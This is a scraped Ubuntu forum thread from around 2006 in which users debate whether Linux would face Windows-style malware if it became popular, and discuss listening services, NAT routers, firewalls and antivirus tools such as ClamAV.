I think the whole setup.exe culture that's become mainstream now has been the ruin of security and Windows-to-Ubuntu migration...

It's sad.
Amen.

I think it comes down to the actual knowledge of the user, if you had 100 computer illiterate people working on windows or on Linux, they would probably all breach security by searching for software to install.

However I would say more harm would be done to windows systems, as everything is mostly .exe, where as with Linux you get different formats e.g. rpm.deb,source.

Mostly users would not understand source code/compiling and would more than likely just delete the package, rather than searching on how to install, so no harm would be done there.

But it's not to say Linux is impenetrable, all a user has to do is click .deb and enter password.

But it's not to say Linux is impenetrable, all a user has to do is click .deb and enter password.

Yes, and the user gets very comfortable with entering their password often in Ubuntu.

The "dumb" users will stay with Windows, as it caters for them better. I'm not being nasty, or slagging off Windows - it's just the truth. Linux will attract the people who want to use their computer, as opposed to having their computer use THEM.

When the kind of people who want to use Linux start using it, they will become a part of the Linux community - a community which puts emphasis on "Don't install binaries which are not backed by a company or credible organisation" and "Don't run as root". Heck, on Windows I don't even install "Freeware" or "Shareware", even when it's been reviewed by Cnet.

By contrast, the Windows community has "Get an anti-virus program" and "Install the updates" as the only security messages. The Linux culture is completely different, and people who use Linux always end off with a true security practice.

I have to disagree with you there, 3rdalbum.

The subject of this thread is "If Ubuntu (or linux in general) were more popular," and if it were significantly more popular (20% desktop marketshare or above), we would attract dumb users.

What you're talking about with the whole "Linux community" would be the people using Gentoo, LFS, Slackware... yes, even Ubuntu.

The "dumb users" would be on Linspire or PCLinuxOS or some other "friendlier" distro.

And I know Kevin Carmony says Linspire allows you to create an additional user, but it still defaults to the first user being root.

I often hear that Windows just gets the bulk of the viruses because it's the most popular, and thus the virus will do the most damage. It seems like some angry hacker out there would throw together linux viruses or something just to show it can be done.

Is Ubuntu really more secure, or is it just that no one cares?


Yet, despite having had a majority market share for ever, Apache suffers much fewer attacks then IIS does. So this statement does not hold true.

Yes, an increase in Linux usage would make it a bigger target, but better security and safe defaults make it a harder target, specially since it is not a monoculture.

In an ideal world, one system should not have a 99% market share, be it windows or Linux. There is room for multiple interoperable Free Software OS's.

Actually virus could get root rights.. if the virus uses some unknown hole, that allows it to become root, then it could do about anything.

Yes, and this is how most Unix malware works. It is however much more difficult to write such an exploit then to make Hotchicks.wmv.exe and have it opened through Outlook which is running with admin privileges...

Writing malware based on such exploits also limits you to the window of vulnerability until the software is patched, which is rather small for most Free Software products.

I think the reason people make viruses is to have the larges probablility of success. This will always put the most popular software first. Windows is that.

When Linux becomes the only OS, there will be former windows and Mac users who are pissed, and will create viruses for us. Payback time? I am confident we can defend against them well enough in the information war...

i've just run a bunch of online scans on an up-to-date installation of ubuntu 6.06 and so far the only things it doesn't seem to block on its own are ICMP ping requests
everything else is coming up completely stealthed

of course, my router which comes with a firewall could be having something to do with that, but they look like pretty decent results to me :p

Not using an Antivirus. I could survive without an Antivirus in Windows, I have absolutely no problems in Linux.

I'm using iptables with firestarter,tho, for a firewall. For maximum security.

quick question.... reading through more of this thread, i see a lot of mention of "listening services"..... what are they? :p

i've just run a bunch of online scans on an up-to-date installation of ubuntu 6.06 and so far the only things it doesn't seem to block on its own are ICMP ping requests
everything else is coming up completely stealthed

of course, my router which comes with a firewall could be having something to do with that, but they look like pretty decent results to me :p

Nothing to do with Ubuntu unfortunately. As you're behind a NAT firewall it will choose whether to accept connections requests or drop or reject them.

If you were not behind a NAT router you would see the online scans reporting everything closed not stealthed. Default Ubuntu doesn't have any services listening anyway. A reject is as good as a drop unless you don't want anyone to know you're there.

I have a default install of Kubuntu 6.06.1 and I tested my setup with ShieldsUp and Hackers.org or something and every test came up stealthed and secure.

I have lost the links to whereever I did the tests but I got them from an Ubuntu link which recognised the sites as valid and trustworthy

ShieldsUp (http://www.grc.com)

quick question.... reading through more of this thread, i see a lot of mention of "listening services"..... what are they? :p
Seconded - can someone who knows more than me please define "listening services".

My Ubuntu auto checks for updates and the update notification pops up on the panel - is that a "listening service" and if so is that a vulnerability?

Or if I put the Gmail notifier onto Firefox (I haven't!) - does that count?

Pretend I know nothing (to be honest, you won't have to pretend too hard!)

Thanks,

A.

OK guys easy.

Listening services are services that listen on your PC. They listen for incoming connections on whatever port you assign them or they default to.

e.g. Apache web server is a service and listens on port 80. OpenSSH-server listens on port 22. FTP server listens on port 21 etc.

A default install of (k)Ubuntu has no services installed or enabled.

An easy way to check is to open a terminal and type

nmap localhost Which will port scan your PC and tell you if anything is listening. Mine reports back:
darrenm@darrenm-desktop:~$ nmap localhost

Starting Nmap 4.10 ( http://www.insecure.org/nmap/ ) at 2006-10-13 22:25 BST
Interesting ports on localhost (127.0.0.1):
Not shown: 1672 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
139/tcp open netbios-ssn
445/tcp open microsoft-ds
631/tcp open ipp
6000/tcp open X11
Which is a few. But should I be worried? No, because I use an ADSL router and I only have port 22 forwarded from my outside IP to my inside IP.

Therefore when I do an nmap on my IP from outside I get only port 22 open.

Not having a firewall installed on Ubuntu will mean if you port scan directly to the Ubuntu box you will get a reject back from the kernel for every port that doesnt have a service listening on it. This means a remote attacker will know there is something there but nothing listening and nothing to attack. If you have a NAT router then when a remote attacker port scans the router it will not have anything forwarded anywhere and will reject the connections (as most routers are just Linux anyway) or with more modern routers will just drop the packets and not send anything back.

OK guys easy.

Listening services are services that listen on your PC. They listen for incoming connections on whatever port you assign them or they default to.

e.g. Apache web server is a service and listens on port 80. OpenSSH-server listens on port 22. FTP server listens on port 21 etc.

A default install of (k)Ubuntu has no services installed or enabled.

An easy way to check is to open a terminal and type

nmap localhost Which will port scan your PC and tell you if anything is listening. Mine reports back:
darrenm@darrenm-desktop:~$ nmap localhost

Starting Nmap 4.10 ( http://www.insecure.org/nmap/ ) at 2006-10-13 22:25 BST
Interesting ports on localhost (127.0.0.1):
Not shown: 1672 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
139/tcp open netbios-ssn
445/tcp open microsoft-ds
631/tcp open ipp
6000/tcp open X11
Which is a few. But should I be worried? No, because I use an ADSL router and I only have port 22 forwarded from my outside IP to my inside IP.

Therefore when I do an nmap on my IP from outside I get only port 22 open.

Not having a firewall installed on Ubuntu will mean if you port scan directly to the Ubuntu box you will get a reject back from the kernel for every port that doesnt have a service listening on it. This means a remote attacker will know there is something there but nothing listening and nothing to attack. If you have a NAT router then when a remote attacker port scans the router it will not have anything forwarded anywhere and will reject the connections (as most routers are just Linux anyway) or with more modern routers will just drop the packets and not send anything back.

Don't use localhost. It maps to the loopback device and is not exposed to the outside.

Run nmap against the IP address of your Ubuntu box and the picture will be different.

If you actually read my post thats what I've said. nmap'ing localhost will tell you whats listening and my point was when you nmap from outside it will tell whats being forwarded outside.

Perhaps actually reading the post you are replying to next time will be a little more helpful.

e.g. Apache web server is a service and listens on port 80. OpenSSH-server listens on port 22. FTP server listens on port 21 etc.

A default install of (k)Ubuntu has no services installed or enabled.

So since I don't use any of these services anyway, (P2P, Bittorent, etc.), delete and filter out email addresses I don't know or want, I'm pretty much secure? I have noticed 98 to 99% of the running processes are sleeping most of the time.

If you actually read my post thats what I've said. nmap'ing localhost will tell you whats listening and my point was when you nmap from outside it will tell whats being forwarded outside.

Perhaps actually reading the post you are replying to next time will be a little more helpful.


I don't think I misunderstood your post.
But I wanted to point out that regardless of having a router in place, there is a difference between services listening on localhost (127.0.0.1, loopback) and actually listening services on your real interface.

Which should be none on a default Ubuntu install. Hoary at least had some stuff for internal use listening on localhost (I think cups still does that on Dapper too, btw).

And yes, it does still answer to an ICMP echo packets (ping), which many routers also do. Not answering them can cause connections to drop, so that's not a good idea by default.

I was wondering, as linux becomes more user-friendly and becomes more used will its security become comprimised. Hypathetically if linux became extremely popular would it be right to assume that linux would become just like windows... please dont insult i'm not very clued up on the linux operating system but one of the main reasons I use Ubuntu daily is due to its security. I just want facts there seems to be a big up-roar when mentioning security, anti virus, firewall etc

Thanks

Mike

Hmm, well, the big difference is the whole admin thing. You can't destroy the OS without getting administrator permissions, so a virus couldn't kill your OS (AFAIK) unless you specifically run it with sudo.

Also, Ubuntu in particular has repositories, which you can trust 100%, and because of so much software in these repos, you won't need to install dodgy software, hence avoiding what happened in the first paragraph.

while there surely will be more exploits for linux when it gets more popular these exploits will be not only fixed much faster but also wont have such a devastating effect like on windows where most people work with admin rights all the time.

the most important part of linux is that out of the box the security is rarely left behind for some more user friendliness (which actually often means windows like and not necessarily user frindly in my opinion).

That makes alot of sense, thats pretty cool - so the community keeps linux secure and a float, so I guess the only real problem would be hackers... I guess they would need your root password to do damage, right? by default ubuntu doesnt run as root does it, hense all the passwords when you do want to run as root?

Thanks Mike

That makes alot of sense, thats pretty cool - so the community keeps linux secure and a float, so I guess the only real problem would be hackers... I guess they would need your root password to do damage, right? by default ubuntu doesnt run as root does it, hense all the passwords when you do want to run as root?


well i would not say that only the community repairs it because a lot of the major programs are also written by people employed by big companies (ibm, novell, red hat, trolltech, sun, etc...) but the open source of lamost all linux components makes it easier to spot exploits and fix them.

if someone wants to compromise your system then he needs somehow root access. but actually also with you user account alone he can do a lot of damage to your data (and actually in ubuntu having your user password is mostly also the same as having the root password by using sudo). so important are strong paswords and some common sense. then one is alsmost perfectly secure under linux.

"User friendly" is such a ambiguous statement. To me Linux/Unix is friendly because I can do what I want with the system, such as make my own modifications to programs, modify themes for my desktop, pick my gui, and even edit the OS myself. Technically its friendly to the user because it doesnt slap me in the face with licensing issues and law suits for making something run better, or am forced to sign my soul over the EULA which will bound me to this earth serving the microsoft tyrant for years to come in order to bring hell on earth (sorry for the trolling... microsoft's idea of "intellectual property" is not my favorite subject). If you mean in terms of automation windows doesnt even compare to OS X.
Therefore, the question is not "When will linux become like windows", because, linux will never be like windows because they are two very, COMPLETELYm different animals, but "When will linux have more commercial support, driver support, etc etc."
Only time will answer that question

A user-friendly OS and a secure OS are not exclusive of one another. Many of the security holes which plague Windows are a result of code written long ago.

I think if you start from a more secure point you will end up in a more secure place. You can add all the eye candy and GUI options you want without changing the underlying software that runs it all behind the scenes.

One of the other things that Linux has going for it is that it was created to be a multi-user OS from the start. One of the security issues in Windows XP was that they slapped a multi-user environment on a single-user OS without much thought.

Bottom line, I propose that a system can be both secure and easy to use.

Since it seems more discussion-oriented than support-oriented, I've moved this thread to the Ubuntu Cafe.

I hope Linux will never become like Windows. Well, those two have a fundemental different approach.

A few myths to dispel:

Popularity of the OS is the only difference in security
Windows XP and before (I haven't tried Vista) are not constructed with security in mind. You can make them secure, but if you try to run as a limited user, you'll find yourself coming up against a lot of obstacles, and you'll have to use a lot of workarounds to get the Run as command to work for all the functions you need.

Both Windows and many of the programs designed for it (http://www.pluralsite.com/wiki/default.aspx/Keith/HallOfShame.html) assume you operate as the administrative user.

Popularity has nothing to do with security
The more popular desktop Linux gets, the more targeted it'll be and the more dumb (i.e., not security-savvy) users that will come along for the ride. More malware creation + more dumb users = more exploits being exploited. Social engineering will always bypass good security design.

All you have to do is design some new "cool" application that new users want, make it a .deb file people can download and double-click, and they'll give away their passwords readily and allow you to install whatever malware you want. Dumb users don't care about trusted sources (like repositories). They'll install anything.

You need root access to do damage
You do need root access to do system-wide damage, but someone who is stupid and belongs to the admin group will install anything and so security goes right out the door.

Also, to me (and a lot of other users), the most important files on my system are the ones in my /home folder--my personal files. Those, if lost, cannot be replaced. System files, however, can be replaced with a simple reinstall. Regular back-ups of important personal files are important to do.

From the Seinfeld episode "The Robbery":

ELAINE: They were stolen.

JERRY: Stolen? When?

ELAINE: A couple a hours ago, the police are coming right over.

JERRY: Stolen?

ELAINE: [Kramer enters the apartment] Someone left the door open. [it's clear that she means Kramer; she walks to the bathroom]

JERRY: [to Kramer] You left the door open?!

KRAMER: Uh, Jer, well ya know, I was cookin' and I, I uh, I came in to get this spatula...and I left the door open, 'cause I was gonna bring the spatula right back!

JERRY: Wait, you left the lock open or the door open?

KRAMER: [bobs his head guiltily] The door.

JERRY: The door? You left the door open?

KRAMER: Yeah, well, I was gonna bring the spatula right back.

JERRY: Yeah, and?

KRAMER: Well, I got caught up... watching a soap opera...[with a broken voice] The Bold and the Beautiful

JERRY: So the door was wide open?

KRAMER: Wide open!

JERRY: [Elaine enters the living-room] And where were you?

ELAINE: I was at Bloomingdale's...waiting for the shower to heat up.

KRAMER: Look, Jerry, I'm sorry, I'm uh, you have insurance, right buddy?

JERRY: No.

KRAMER: [looks shocked] How can you not have insurance?

JERRY: Because...I spent my money on the Clapgo D. 29, it's the most impenetrable lock on the market today...it has only one design flaw: the door...[shuts the door] must be CLOSED In case you don't get the analogy, the Clapgo D. 29 is desktop Linux, and Kramer is a bunch of new users who would be the majority of users if desktop Linux became popular.

That's a nice way to show how reality looks like, aysiu.

I just noticed since edgy, ubuntu warned me for unsafely unplugging my usb-storage - ARGHH! Ubuntu IS more and more windows-like XD ;)

to refer to the topic, linux will kopefully NEVER become "just like windows" it will be even BETTER, for the time ammount:
atleast 2 years
some major things need to happen before
wbr Shin Gouki

it will be more stable, have better security, and there will be less spyware and viruses due to the more secure the webbrowsers are and the overall operating system is, but there is still no way to have a totally secure operating system if the person running it is a complete idiot =P

The day Ubuntu (Linux) looks just like Windows is the day I leave. I left Windows because I enjoy a challenge. Plugging something in and having it work is boring. Why not set it up manually if you have the time? I do not like the way Windows works in many dementions.

My dad recently got a computer, and becasue I was going away to college, I put on linux for him because I knew there was no way he would take care of a computer. I set everything up for him nice nice, explained all the things that he would want to do, and told him if something doesnt work, play around with it.

Also, I never told him what the sudo password is :)

NEVER, NEVER :mrgreen:

It will never become just like Windows, but as it grows more popular you will have to be more careful about downloading programs from unofficial sources. Not that you do that often in the Open Source world, but still.

Linux is just a kernel.

"It" cannot be just like Windows. Windows is one product produced by one company. Linux is a host of distributions, targeting various needs and types of users.

Damn Small Linux, SELinux, Fedora, Slackware, LFS, and Ubuntu will never serve the same needs. There will always be a variety of distributions. Maybe one (Linspire?) will be "just like Windows," but they can't all be.

The whole "Linux is only secure until the masses move to it" idea isn't based on anything I would consider to be logic. Apache holds between 60 and 80% of the web server market share, and a very large percentage of machines running Apache are running Linux.

You mean to tell me people do not wish to compromise these servers? You mean to tell me people aren't already banging away at Linux?

Exploits are found very often. They are reported. They are fixed. Everything is disclosed. The open source model makes this a very efficient process.

With Windows, the vulnerability to viruses is not being addressed. Microsoft itself is even selling anti-virus software. It is a complete joke.

If a base vulnerability to automated self propagating malicious programs existed in any distro of GNU/Linux, it would be hammered out so fast it would make Steve Balmer's head spin. Why?

Pride, community, and the power of the open source development model. Full disclosure of source code allows the bad guys and the good guys to find the holes, the developers to patch them up, and everyone the opportunity to improve the software.

Linux cannot become like Windows because it is different on a philosophical level. Linux isn't an up and coming competitor. GNU/Linux is a replacement for the entire idea of proprietary software. Yes, there is currently a need for free (or open source) software to be interoperational with proprietary software, but things are improving in that area.

Linux will never be "just like Windows". However, Windows users with terrible habits will be Linux users with terrible habits. The only computer that is safe for use by a person who cannot make use of common sense to use is one without any writable drives.

Ok, I have read this post, and been thinking about it. I think the biggest problem of viruses is not necessarily programs that are installed but rather email. I have successfully run Windows Virus free for quite some time, oh, it comes at a cost, of Name Brand Firewall, and Name Brand Anti-virus. However I have been running Ubuntu for a while now, and when I switched over to windows and it started scanning, it found viruses that were on the Linux partition (I can read ex3 from windows.) I started scanning my directories now with ClamAv, and have found viruses that come in my email. I have not figured out how to get it to automatically scan my email, but I think that is the virus hazard that is bigger than installed programs. Granted, I don't open the attachments, but they sit there as a potential danger. Lost my whole junk folder in Mozilla because of this, and had to make a new one, I know not a big deal, but bothersome to me that it could even set there, when it is not even let in the door on my XP partition. That is my 2 cents worth, and yes, the more 'stupid' users you have the more problems there will be on there systems.

Shane

I've moved this to the Cafe, since this is more discussion and not so much a testimonial.

By the way, I created a short security FAQ:
http://www.psychocats.net/ubuntu/security

I'm not so sure about Linux having the problems windows has if it were used as much. Its primary advantage is being open source. The way a unix system is setup makes a big difference too. A normal user can't modify important system files. Firefox is used very much and probably just as much or more as IE. It is open source. It does not have the problems of IE. It doesn't bring in loads of spyware, trojans, malaware, adaware, viruses and others just from browsing the web.

All the security features of VISTA (Viruses Infections Spyware Trojans Adware) really puts a load on the system and slows it down. Who wants to click on pop ups all day to do normal tasks because there is loads of security junk? That's worse than SP2.

I don't know about viruses per se, but if we get more users we will get more malware... mainly because attracting more users means attracting both malicious parties and stupid users.
Bingo.

I think that the reason that linux does not have any viruses is that everyone that knows how to code is using Linux (who would be crazy enough to write a virus for windows while using windows - then get infected yourself and have to wait till microsoft releace a patch).

What do you think?

I'm sorry - I don't really get it. If everyone that can code uses Linux, then wouldn't the viruses be on Linux, since viruses are written by coders?

Also, the reason that there is no (or very few) Linux viruses is that the filesystem and root accounts make it extremely hard for a virus to destroy your PC.

There is one type of "virus" (more like a prank) called a fork bomb. I'm not going to link to it here for many reasons, but you can find it on Wikipedia. It is one line of code that splits into many threads, causing almost an instantaneous lockup. It's more of an annoyance than anything else. With more restrictive machines that restrict the number of processes that can be run, it is even harder for the program and other viruses.

There may be a grain of truth to your hypothesis, but it's a very small grain, and only one of many other contributing factors to the lack of Linux viruses in the wild.

For more on my thoughts on the matter:
http://www.psychocats.net/ubuntu/security

who would be crazy enough to write a virus for windows while using windows - then get infected yourself and have to wait till microsoft releace a patch ](*,) ](*,) ](*,)


LOL. Can just imagine it!

Don't think your hypothesis holds however...

I'm sorry - I don't really get it. If everyone that can code uses Linux, then wouldn't the viruses be on Linux, since viruses are written by coders?
why write a virus for the OS you are using - you will get infected yourself?

There is some truth to this. Linux users tend to use it for ethical reason, so why would they want to do something malicious like infecting other machines?

why write a virus for the OS you are using - you will get infected yourself?
You won't get infected yourself if you don't release it on yourself. ;)
It it nearly impossible to write a virus for one OS from another OS. Trust me, almost every virus writer for Windows uses Windows.

[Sorry, double-post]

I expect most modern virus writers develop and test in a virtual machine. If I were writing a virus, I'd also come up with some way for the virus to identify and ignore my own computer.

I think that most virus writers are intelligent enough to avoid getting viruses (especially their own) themselves. As far as writing a virus that can identify your computer, I think that most virus writers would avoid that because, if the virus was taken apart, others could identify the creator's computer as well.

I expect most modern virus writers develop and test in a virtual machine. If I were writing a virus, I'd also come up with some way for the virus to identify and ignore my own computer.

Yeah cause it would be so hard for the FBI to identify you otherwise :p

On topic I think your theory is very odd, doesn't make any sense. If you wrote the virus you know how to protect yourself. Unofficial windows patches for serious exploits (like the WMF one) were realesed before the MS official ones.

Most virii target exploits/vulnerabilities in system libraries. Using Linux, it is hard to take down the whole community, because between distributions (and releases of that distribution), library versions and kernel versions are very likely not the same. For example, the Ramen virus (http://www.f-secure.com/v-descs/ramen.shtml) only affected RH 6.2-7.0, even though there were plenty of other Linux boxen out there running the same services.

Barely any computers are running linux compared to the number of machines running windows.
If you're writing a virus, you most likely want to hit as many machines as possible. So you're not going to write it for a niche-market operating system.

you would have to think it has something to do with the most effective deployment. poOf makes a point, not every linux user is using the same system; unlike windows where everbodies system is exactly the same.

but if you are going to spend the time to write something malicious; you probably want to get your times worth. with about 95% of desktop users in the world using windows its a pretty sure bet your going to get time back-out if you wrote your virus to work under windows... that said the other 5% of people, the linux users, are usually smart enough to not get viruses even if they were using windows. I have used windows for years, making the switch to ubuntu about 9mo ago. I only once has a virus problem, and it was my fault (email bomb, email from a friend that usually sends me junk email, didn't think it would be problem, oops).

... and if we want to play conspiracy theory, there arn't many people making virus software for linux... but there are ALOT of companies making virus software for windows, and most of these virus packages arn't cheap; its big business... coincicence?

If Linux was running on more computers, virus writers/hackers would aim at this. Linux might be more secure, but if the data is good, the effort is eventually no object.
While with Windows being flakey security wise too (by default), the 13yr old with a mean streak would even attempt to take down his Gran's website (especially if it contains a horrid pic of him!)

As far as writing a virus that can identify your computer, I think that most virus writers would avoid that because, if the virus was taken apart, others could identify the creator's computer as well.

I meant that the virus would check certain characteristics of the computer as the first step in infection, and if they match the ones programmed into the virus, the infection process would be canceled. For example, it could compare a registry value or the contents of a file with a hash built into the virus.

Most virii target exploits/vulnerabilities in system libraries. Using Linux, it is hard to take down the whole community, because between distributions (and releases of that distribution), library versions and kernel versions are very likely not the same. For example, the Ramen virus (http://www.f-secure.com/v-descs/ramen.shtml) only affected RH 6.2-7.0, even though there were plenty of other Linux boxen out there running the same services.

Just a thought but if with the rising popularity of Linux as an OS, and therefore the likelihood of more 'homogenous' installs - i.e. default unpatched install from CD/DVD. Wouldn't this mean more people had the same versions of libs etc... You could also target users running a particular app that has a dependency on a particular version of a lib, such as Open Office.

May we get some variation of 'back orifice', such as 'furry front orifice'? We may then be well and truly shafted.... :-# :rolleyes:

just my deux centimes...

It really reflects security. Apache has about 67% of the market for web servers, and Microsoft has about 20% of the market. Guess which one has more problem with viruses, worms, trojans and other malware?

... the likelihood of more 'homogenous' installs - i.e. default unpatched install from CD/DVD ...

That could happen, but how often do people leave an install as is? Probably not often enough to tempt someone into writing a virus specifically targeted at default installs of distro X. The first thing I do, on installation of any OS, is download updates.

... 'furry front orifice' ...

Lol, thanks for the visual first thing in the morning. :)

It really reflects security. Apache has about 67% of the market for web servers, and Microsoft has about 20% of the market. Guess which one has more problem with viruses, worms, trojans and other malware?

M$ with only 20% ?
wow - I guess I'm in the wrong business.... (just finishing my MCSE....everyone needs to have a job ;)).

Lol, thanks for the visual first thing in the morning. :)

Just doin' ma jahb. ;-)

There is room for multiple interoperable Free Software OS's.

No there is not. We live in a world of uniformity; it will be either windows, or linux, or neither, not and. This concept of having many OS's coexisting is the very reason linux hasn't gone mainstream on the desktop yet; there are too many half-good distros, and no main, unified, universal distro you could point to and call "linux" (yes, I know it's a kernel, but it's what many people call an operating system). Fragmentation is not an option, and it should not be promoted; ubuntu should make unifying the free software/linux world a priority, as it must do so before it can be truly competitive in the windows world. As for the question, yes, the instant Dells start shipping with ubuntu, which I doubt will ever happen, people will start double-clicking on random debs that come via spam, give their password, click-click-click on next as they did in windows, and no security exists, or will ever exist, that will protect against stupidity.

As I always understood it (and I might be horribly wrong here), the biggest liability from malware (apart from PEBKAC), was the malware writers exploiting weaknesses on 'x' software (say outlook) running on 'y' version of Windows 2000 SP3. Due to the sheer number of windows users, there is a likelyhood that there will be a significant number of targets for the malware.

With GNU/Linux, there is a huge variety in software being run. There's tweltybillion varieties of linux distros, with users running different kernels, custom kernels, and massive varieties of browsers/email programs/everything. So the number of potential targets for malware drops exponentially.

Please correct me if i'm completely wrong.

With GNU/Linux, there is a huge variety in software being run. There's tweltybillion varieties of linux distros, with users running different kernels, custom kernels, and massive varieties of browsers/email programs/everything. So the number of potential targets for malware drops exponentially.

Yes, in its present state, GNU/Linux is like that. But think of how it would be like when, if ever, it gets a significant market share in the desktop market. By then, there will be far less variety in linux, and there will be more uniformity. The only way linux will attain a large market share is if it is shipped preinstalled with computers, because the vast majority of users do not know how to, or feel no need to replace whatever OS came with their computer. And when, if ever, Dell, HP, and the big companies are shipping linux, whatever version they're shipping will be used by 99.9% of linux users. So although variety protects us now, it will not later.

And also, there's way too much emphasis put on automated exploits right now. While ubuntu can protect against this by creating a secure OS, it will not, nor can it, protect against the other major cause of security breaches: the lack of common sense. Among all the instances I've heard of people having issues with their (windows) computers, most of them had to do with them getting some random malicious .exe file from either spam or some 3rd party web site and installing it. How can this differ with .deb files? Even if we put in warning signs and requests for passwords, if users just click-click-click on "next" and "ignore" like most windows users I know do, they will bypass all security mechanisms and get malware installed. So yes, we will have more viruses, spyware, adware, and other malware.

And as for this idea of making software installation all be done through a unified, secure, apt system, it simply won't work. Think of what happened with microsoft's attempt at something similar: msi. It was supposed to have make software installation and removal more uniform, and make everything more secure. But I still see the vast majority of windows applications being distributed as setup.exe files, because some people simply ignore whatever methods are supposed to be used for distributing programs, and use their own. Similarly, while some 3rd party application distributers will adapt the secure apt method, lots will simply use methods like sending them as raw binary executables, which would bypass ubuntu's entire security, and allow for installation of malware.

I was just wondering how many Linux viruses there are currently and how many there are out in the wild currently.

I have seen articles but they are 1+ year(s) old. I know that (unless you are protecting a WIndows computer) a linux antivirus program is about a useless as wearing a raincoat in the desert in the middle of a drought. I just want some info about whether there are any?

Interesting question actually, I found this page: http://www.viruslibrary.com/virusinfo/Linux.htm (I don't know how accurate viruslibrary.com is).
and this one: http://en.wikipedia.org/wiki/List_of_Linux_computer_viruses (last modified on 26 September 2006).

Linux distribution are compatible at the source code level. They are not always binary-compatible. Even different releases of Ubuntu are not always binary-compatible with one another.

On the other hand, windows tries to be binary-compatible throughout.

So any tally of viruses for linux would have to take into account which specific versions of the distro/toolchain/application it can work with. So any number of viruses you can find is not really useful.

One thing that annoys a computer user the most is finding a virus on their computer. Most often, the targets of these attacks are Windows computers. That is because 80% of the computers in the world have Windows as their operating system.

My question to you is this.

If you have a non-windows operating system on your computer (such as Mac, Ubuntu, Debian, etc.), do you have enough virus protection on your computer?

Long as you use common sense you should be fine. If your connected to a network and can spare it, a small antivirus app would help curb the possibility of your computer helping to spread network viruses.

Yes and No.

The issue isn't so much that you are ultimately protected but the fact is that in the event an exploit is found that could result in a virus being written, they are acknowledged and fixed in a timely manner in the cases of OS X, GNU/Linux, BSD, etc.

Also, there isn't a lot of pride or point in writing a virus for the operating systems that aren't agitating the people. Microsoft becomes target to viruses due to a hackers desire of pride in bringing them down and their popularity plays a factor as well. Why would a hacker who is writing a virus for a machine chose to write one for the operating system he is probably running and that only accounts for roughly 5% of the home computing market (if that)? ... yeah, I don't have an answer for that one either.

There was one proof of concept virus that was released by some security company, Linus fixed the linux kernel the next day (iirc).

Hope this helped, I will warn that some of its opinionated so it won't result in a perfect answer, but thats generally my thoughts and understanding of it.

If you have a non-windows operating system on your computer (such as Mac, Ubuntu, Debian, etc.), do you have enough virus protection on your computer?
depends on the definition of enough.
i voted no because stupid ubuntu users with sudo permissions can install malicious software easily.

yeah, this is a difficult one...it is true that Linux and Unix-based systems rarely if ever get viruses...and this reason is probably due to a few facts:

1. a lot less people use Linux compared to Windows, so you can't gain nearly as many systems as a virus-writer would with a Windows virus.
2. Linux users are generally MUCH smarter than Windows users so we know not to click on attachments we don't trust, etc.
3. If a virus did come out for Linux, it's open source so the "vulnerability" would be fixed pretty quickly.

that having been said, i'm SURE Linux viruses exist partly because if no viruses existed, why would there be virus scanners for Linux systems...
Also, very few people are running Linux as root so if a virus does get in, it can't really do much damage.

Are you referring to ClamAV? (that's the only one I know)
Because it's mostly used for scanning windows viruses. It's useful for mail servers:
http://www.clamav.net/whos.html#pagestart

[QUOTE]
Also, very few people are running Linux as root so if a virus does get in, it can't really do much damage.

It can still delete all your data. I care much more about my data than my system, because the system can easily be reinstalled, but the data is lost for ever.
You generally just back up your own data, not the whole system, don't you?

1) There are crossplatform worms that attack applications rather than the OS. i.e. Apache Slammer
2) DOS has viruses ;)
3) OS X has been hit with vurises before if not on the same scale as Windows.

Having a different OS doesn't protect you from viruses, having a well designed OS with an ability to whitelist rather than blacklist software does. This is why there are so many successful viruses for Windows despite the four hundred billion A/V products out there. If a virus is unknown the A/V won't stop it. The only good protection from a virus is making sure that only the applications you know to be safe are executed. If all I do is use Firefox, Gaim and OpenOffice, and set SELinux to only allow those to run there is virtually no way a virus would make it into my machine.

Yes and No.

The issue isn't so much that you are ultimately protected but the fact is that in the event an exploit is found that could result in a virus being written, they are acknowledged and fixed in a timely manner in the cases of OS X, GNU/Linux, BSD, etc.

Also, there isn't a lot of pride or point in writing a virus for the operating systems that aren't agitating the people. Microsoft becomes target to viruses due to a hackers desire of pride in bringing them down and their popularity plays a factor as well. Why would a hacker who is writing a virus for a machine chose to write one for the operating system he is probably running and that only accounts for roughly 5% of the home computing market (if that)? ... yeah, I don't have an answer for that one either.

There was one proof of concept virus that was released by some security company, Linus fixed the linux kernel the next day (iirc).

Hope this helped, I will warn that some of its opinionated so it won't result in a perfect answer, but thats generally my thoughts and understanding of it.

OS X had a hole in it's kernel the size of Texas for about 5 years (it actually came from the BSD flavor they based it on) before it got fixed. Yeah they are a picture of quick response :rolleyes:

does anti virus software really keep you save? there are virus these days that spread to many computers within hours. no antivirus company can keep up with that.

What does `enough' mean? Not a single Linux-using friend of mine has ever gotten a virus or any other type of malware. I think that's enough.

Just as a matter of statistics;

most of the forum users whom have come from a Windose background must have had something to do with a virus. How many Ubuntu/Linux users in general, have had any viral threat/contact all? (and I'm not talking about mail servers.)

depends on the definition of enough.
i voted no because stupid ubuntu users with sudo permissions can install malicious software easily.

We have to be very vigilent ! Source and code should be checked twice when origin not sure

does anti virus software really keep you save? there are virus these days that spread to many computers within hours. no antivirus company can keep up with that.

I noticed that in windows, after one or two years, anti virus scanners are able to see a virus in one file ...

Imagine that during one two years, the viruses are there, muted from another one, mutnat virus that not much programs can detect ... or it takes some time ...

thats call WINDOWS world !

Well it depends. Sure a Linux distribution is far safer than windows, same goes for the Macintosh platform.
Although if the user is stupid enough he is always going to be able to install malicious software on his computer no matter what operating system he's using.
So don't give your sudo password to dumb users!

Are you referring to ClamAV? (that's the only one I know)
Because it's mostly used for scanning windows viruses. It's useful for mail servers:
http://www.clamav.net/whos.html#pagestart



It can still delete all your data. I care much more about my data than my system, because the system can easily be reinstalled, but the data is lost for ever.
You generally just back up your own data, not the whole system, don't you?

i've seen other Linux AV apps...i know AVG has a free version of one...i think there's also one by F-Prot and there are even a few in the apt repos, but i'm too lazy to go look.

and yes, it can destroy your data, but this is why doing incremental backups are good...also, i'd rather not reinstall the whole OS cuz i can rarely remember all the apps i had installed so i usually can't remember to but everything back like it was

i've seen other Linux AV apps...i know AVG has a free version of one...i think there's also one by F-Prot and there are even a few in the apt repos, but i'm too lazy to go look.

and yes, it can destroy your data, but this is why doing incremental backups are good...also, i'd rather not reinstall the whole OS cuz i can rarely remember all the apps i had installed so i usually can't remember to but everything back like it was

clamav should be in the repos

